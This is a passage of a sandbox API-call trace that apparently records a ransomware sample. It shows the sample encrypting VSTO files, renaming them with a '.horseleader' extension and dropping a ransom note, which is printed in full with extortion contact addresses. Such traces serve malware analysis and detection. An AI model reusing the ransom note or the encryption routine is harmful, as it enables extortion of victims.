lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x2cc, lpOverlapped=0x0) returned 1 [0250.665] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.665] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0250.665] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0250.666] CloseHandle (hObject=0x1a4) returned 1 [0250.666] GetProcessHeap () returned 0x780000 [0250.666] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0250.666] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config.horseleader") returned 93 [0250.666] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.config"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.config.horseleader")) returned 1 [0250.667] GetProcessHeap () returned 0x780000 [0250.667] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0250.667] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a612c00, ftCreationTime.dwHighDateTime=0x1cb6585, ftLastAccessTime.dwLowDateTime=0xd6d27ac0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x6a612c00, ftLastWriteTime.dwHighDateTime=0x1cb6585, nFileSizeHigh=0x0, nFileSizeLow=0x18558, dwReserved0=0xb5cdeaf9, dwReserved1=0xa8c03106, cFileName="VSTOInstaller.exe", cAlternateFileName="VSTOIN~1.EXE")) returned 1 [0250.667] lstrcmpiW (lpString1="VSTOInstaller.exe", lpString2="Windows") returned -1 [0250.667] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.exe") returned 78 [0250.668] StrStrIW (lpFirst="VSTOInstaller.exe", lpSrch=".horseleader") returned 0x0 [0250.668] lstrcmpW (lpString1="VSTOInstaller.exe", lpString2="#Decrypt#.txt") returned 1 [0250.668] lstrcmpW (lpString1="VSTOInstaller.exe", lpString2="_uninstalling_.png") returned 1 [0250.668] lstrlenW (lpString=".testttjffg") returned 11 [0250.668] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.exe", lpSrch=".testttjffg") returned 0x0 [0250.668] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0250.668] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0250.668] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0250.672] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.exe") returned 78 [0250.672] StrStrW (lpFirst="VSTOInstaller.exe", lpSrch=".txt") returned 0x0 [0250.672] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=99672) returned 1 [0250.672] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.672] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.675] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.675] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.675] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x9aac, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.675] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.678] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.679] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.679] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x13558, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.679] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.679] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.680] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.680] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.680] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0250.680] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0250.680] CloseHandle (hObject=0x1a4) returned 1 [0250.681] GetProcessHeap () returned 0x780000 [0250.681] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0250.681] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.exe.horseleader") returned 90 [0250.681] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.exe.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.exe.horseleader")) returned 1 [0250.682] GetProcessHeap () returned 0x780000 [0250.682] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0250.682] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a612c00, ftCreationTime.dwHighDateTime=0x1cb6585, ftLastAccessTime.dwLowDateTime=0xd6d4dc20, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x6a612c00, ftLastWriteTime.dwHighDateTime=0x1cb6585, nFileSizeHigh=0x0, nFileSizeLow=0x5e950, dwReserved0=0xb5cdeaf9, dwReserved1=0xa8c03106, cFileName="VSTOLoader.dll", cAlternateFileName="VSTOLO~1.DLL")) returned 1 [0250.682] lstrcmpiW (lpString1="VSTOLoader.dll", lpString2="Windows") returned -1 [0250.682] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOLoader.dll") returned 75 [0250.682] StrStrIW (lpFirst="VSTOLoader.dll", lpSrch=".horseleader") returned 0x0 [0250.683] lstrcmpW (lpString1="VSTOLoader.dll", lpString2="#Decrypt#.txt") returned 1 [0250.683] lstrcmpW (lpString1="VSTOLoader.dll", lpString2="_uninstalling_.png") returned 1 [0250.683] lstrlenW (lpString=".testttjffg") returned 11 [0250.683] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOLoader.dll", lpSrch=".testttjffg") returned 0x0 [0250.683] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0250.683] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0250.683] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOLoader.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoloader.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0250.685] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOLoader.dll") returned 75 [0250.685] StrStrW (lpFirst="VSTOLoader.dll", lpSrch=".txt") returned 0x0 [0250.685] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=387408) returned 1 [0250.685] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.685] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.688] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.688] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.689] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x2cca8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.689] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.694] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.694] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.695] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x59950, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.695] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.697] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.697] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.697] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.698] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0250.698] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0250.698] CloseHandle (hObject=0x1a4) returned 1 [0250.698] GetProcessHeap () returned 0x780000 [0250.698] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0250.699] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOLoader.dll.horseleader") returned 87 [0250.699] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOLoader.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoloader.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOLoader.dll.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoloader.dll.horseleader")) returned 1 [0250.700] GetProcessHeap () returned 0x780000 [0250.700] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0250.700] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a612c00, ftCreationTime.dwHighDateTime=0x1cb6585, ftLastAccessTime.dwLowDateTime=0xd51096e0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x6a612c00, ftLastWriteTime.dwHighDateTime=0x1cb6585, nFileSizeHigh=0x0, nFileSizeLow=0xbb68, dwReserved0=0xb5cdeaf9, dwReserved1=0xa8c03106, cFileName="VSTOMessageProvider.dll", cAlternateFileName="VSTOME~1.DLL")) returned 1 [0250.700] lstrcmpiW (lpString1="VSTOMessageProvider.dll", lpString2="Windows") returned -1 [0250.700] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOMessageProvider.dll") returned 84 [0250.700] StrStrIW (lpFirst="VSTOMessageProvider.dll", lpSrch=".horseleader") returned 0x0 [0250.700] lstrcmpW (lpString1="VSTOMessageProvider.dll", lpString2="#Decrypt#.txt") returned 1 [0250.700] lstrcmpW (lpString1="VSTOMessageProvider.dll", lpString2="_uninstalling_.png") returned 1 [0250.700] lstrlenW (lpString=".testttjffg") returned 11 [0250.700] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOMessageProvider.dll", lpSrch=".testttjffg") returned 0x0 [0250.700] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0250.701] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0250.701] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOMessageProvider.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstomessageprovider.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0250.702] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOMessageProvider.dll") returned 84 [0250.702] StrStrW (lpFirst="VSTOMessageProvider.dll", lpSrch=".txt") returned 0x0 [0250.702] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=47976) returned 1 [0250.702] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.715] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.716] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.717] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.717] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.717] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.717] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1b68, lpOverlapped=0x0) returned 1 [0250.717] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffe498, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.718] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1b68, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1b68, lpOverlapped=0x0) returned 1 [0250.718] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.718] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0250.718] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0250.718] CloseHandle (hObject=0x1a4) returned 1 [0250.719] GetProcessHeap () returned 0x780000 [0250.719] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0250.719] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOMessageProvider.dll.horseleader") returned 96 [0250.719] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOMessageProvider.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstomessageprovider.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOMessageProvider.dll.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstomessageprovider.dll.horseleader")) returned 1 [0250.721] GetProcessHeap () returned 0x780000 [0250.721] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0250.721] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a612c00, ftCreationTime.dwHighDateTime=0x1cb6585, ftLastAccessTime.dwLowDateTime=0xd51096e0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x6a612c00, ftLastWriteTime.dwHighDateTime=0x1cb6585, nFileSizeHigh=0x0, nFileSizeLow=0xbb68, dwReserved0=0xb5cdeaf9, dwReserved1=0xa8c03106, cFileName="VSTOMessageProvider.dll", cAlternateFileName="VSTOME~1.DLL")) returned 0 [0250.721] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0250.721] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\#Decrypt#.txt") returned 74 [0250.721] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0250.722] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0250.722] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0250.724] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KO